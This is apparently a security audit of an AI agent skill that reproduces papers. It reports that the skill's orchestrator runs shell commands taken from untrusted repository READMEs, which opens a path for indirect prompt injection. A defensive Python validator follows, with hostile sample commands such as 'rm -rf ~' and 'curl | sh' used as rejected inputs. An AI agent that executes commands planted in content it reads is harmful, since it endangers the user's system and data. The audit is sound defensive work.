ai-paper-reproduction

Warn

Audited by Gen Agent Trust Hub on Apr 2, 2026

Risk Level: MEDIUM
Categories: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The orchestration script executes shell commands parsed from external repository README files.
      • Evidence: In scripts/orchestrate_repro.py, the maybe_run_command function uses subprocess.run to execute strings extracted from the target repository's README.
  • [REMOTE_CODE_EXECUTION]: The skill executes third-party code as part of its AI paper reproduction workflow, including scripts from other parts of the skill that were not provided for this analysis.
      • Evidence: The workflow defined in SKILL.md and implemented in scripts/orchestrate_repro.py centers on running code from unverified AI repositories. The orchestrator also attempts to execute adjacent scripts (scan_repo.py, extract_commands.py, and write_outputs.py) whose contents are missing from the analysis package.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it ingests untrusted README content that then drives system-level actions.
      • Ingestion points: The repository's README.md file is processed in scripts/orchestrate_repro.py to select and run shell commands.
      • Boundary markers: The skill uses no delimiters or security instructions to isolate untrusted content during parsing or execution.
      • Capability inventory: The orchestration script has access to subprocess.run for system command execution and to file system APIs.
      • Sanitization: shlex.split provides only syntactic parsing (tokenization); the skill performs no semantic validation or filtering of the commands extracted from the untrusted source.
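To make the sanitization gap concrete, here is a minimal Python sketch of the kind of semantic check that could sit between README parsing and subprocess.run. It is not the skill's maybe_run_command, whose source is not reproduced here. The names validate_readme_command and run_validated, the executable allowlist, and the rejected-character set are all hypothetical assumptions chosen for illustration.

```python
import shlex
import subprocess
from typing import List, Optional

# Hypothetical policy: the audited skill defines no allowlist; these values are
# illustrative assumptions for a paper-reproduction run.
ALLOWED_EXECUTABLES = {"python", "python3", "pip", "pytest"}
INTERPRETERS = {"python", "python3"}
INLINE_CODE_FLAGS = {"-c"}        # `python -c ...` would run arbitrary inline code
SHELL_METACHARS = set(";|&<>`$")  # chaining, redirection, substitution


def validate_readme_command(command: str) -> Optional[List[str]]:
    """Return an argv list for an acceptable README command, or None to reject it."""
    try:
        argv = shlex.split(command)
    except ValueError:
        # Unbalanced quotes etc.: refuse rather than guess the author's intent.
        return None
    if not argv or argv[0] not in ALLOWED_EXECUTABLES:
        return None
    for token in argv[1:]:
        # With shell=False these characters are not interpreted, but their
        # presence suggests the README tried to chain or redirect commands.
        if any(ch in SHELL_METACHARS for ch in token):
            return None
        if argv[0] in INTERPRETERS and token in INLINE_CODE_FLAGS:
            return None
    return argv


def run_validated(command: str, cwd: str, timeout_s: int = 600) -> Optional[subprocess.CompletedProcess]:
    """Run a README command only if it passes validation; never via a shell."""
    argv = validate_readme_command(command)
    if argv is None:
        return None
    # Passing a list (shell=False by default) means no shell parses the string.
    return subprocess.run(
        argv, cwd=cwd, timeout=timeout_s, capture_output=True, text=True, check=False
    )


if __name__ == "__main__":
    print(validate_readme_command("python train.py --epochs 3"))  # ['python', 'train.py', '--epochs', '3']
    print(validate_readme_command("python train.py; rm -rf ~"))   # None
    print(validate_readme_command("curl https://example.com/x.sh | sh"))  # None
```

An allowlist only narrows which programs are launched. An accepted command such as `python train.py` still runs untrusted repository code, so the check does not replace isolating the run from credentials and sensitive files.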
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 2, 2026, 05:40 PM